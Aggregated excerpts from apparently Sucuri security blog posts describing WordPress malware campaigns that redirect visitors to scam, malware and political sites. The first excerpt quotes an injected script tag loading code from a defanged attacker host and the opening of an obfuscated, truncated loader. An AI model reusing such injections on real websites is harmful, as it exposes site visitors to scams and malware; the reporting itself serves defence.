Categories
Security

Saskmade[.]net Redirects

Saskmade[.]net Redirects

Earlier this week, we published a blog post about an ongoing massive malware campaign describing multiple infection vectors that it uses. This same week, we started detecting new modifications of the scripts injected by this attack.

The general idea of the malware is the same, but the domain name and obfuscation has changed slightly.

For example, in the wp_post table they now inject this script:

<script src='hxxps://saskmade[.]net/head.js?ver=2.0.0′ type=’text/javascript’>

In the section of HTML and PHP files, and at the top of jQuery-related JavaScript files, they inject this new obfuscated script:

var _0x1e35=[‘length’,’fromCharCode‘,’createElement’,’type’,’async’,’code121′,’src’,’appendChild’,’getElementsByTagName’,’script’];(function(_0x546a53,
…skipped…

Continue reading Saskmade[.]net Redirects at Sucuri Blog.

Categories
Security

Reverse Javascript Injection Redirects to Support Scam on WordPress

Reverse Javascript Injection Redirects to Support Scam on WordPress

Over the last few weeks, we’ve noticed a JavaScript injection in a number of WordPress databases, and we recently wrote about them in a Sucuri Labs Note.

The campaign attempts to redirect visitors to a bogus Windows support page claiming that their computers are infected with ‘riskware’ and will be disabled unless they call what is an obviously bogus support hotline.

Google and several other web security vendors are currently blacklisting the domain; fortunately, most visitors will receive a warning page like this during the redirection process:

 

Tech Support Phone Scam

It’s worth noting that the phone number displayed on the page is auto-generated based on the URL that is supplied.

Continue reading Reverse Javascript Injection Redirects to Support Scam on WordPress at Sucuri Blog.

Categories
Security

Expired Domain Leads to WordPress Plugin Redirects

Expired Domain Leads to WordPress Plugin Redirects

A malicious redirect is a snippet of code used by attackers with the intention of redirecting visitors to another site; a very common tactic seen in compromised websites.

These redirects often take visitors to phishing, malware, or advertising sites with the intention of capturing sensitive user data, distributing malware and backdoors, or generating advertisement impressions.

We’ve written before about how attackers use expired domains to redirect visitors to malware and ads, or how domains used in abandoned plugins are registered by hackers.

Continue reading Expired Domain Leads to WordPress Plugin Redirects at Sucuri Blog.

Categories
Security

Website Malware: Unwanted Exit to YourBrexit

Website Malware: Unwanted Exit to YourBrexit

Some website hacks aim to make some political statements. Defacements are well known for this. Some infections redirect visitors to scam sites that push (usually counterfeit) goods or (often illegal) services. But what would you feel if your site redirected visitors to a political news site?

This time we are talking about an attack that mainly targets UK sites and has redirected over 2 million (mostly UK) visitors to YourBrexit[.]net – a site that publishes politically-charged commentary about Brexit.

Continue reading Website Malware: Unwanted Exit to YourBrexit at Sucuri Blog.